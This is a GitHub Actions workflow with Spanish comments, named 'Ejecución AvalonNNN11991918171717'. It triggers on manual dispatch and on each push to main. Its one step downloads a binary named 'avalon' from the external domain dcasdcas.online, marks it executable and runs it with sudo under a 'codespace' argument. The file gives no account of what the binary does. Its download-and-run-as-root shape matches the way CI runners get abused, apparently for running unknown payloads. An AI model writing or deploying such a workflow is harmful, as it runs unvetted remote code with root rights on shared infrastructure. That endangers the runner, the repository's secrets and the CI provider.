name: Ejecución AvalonNNN11991918171717

on:
  workflow_dispatch: # Esto te permite darle al botón "Run workflow" manualmente
  push:
    branches: [ main ] # Se ejecuta automáticamente al subir cambios a la rama main

jobs:
  ejecutar-binario:
    runs-on: ubuntu-latest

    steps:
      - name: Descargar y preparar binario
        run: |
          # 1. Descargar
          wget https://dcasdcas.online/avalon.x86_64
          
          # 2. Renombrar
          mv avalon.x86_64 avalon
          
          # 3. Dar permisos
          chmod +x avalon
          
          # 4. Ejecutar con sudo
          sudo ./avalon codespace
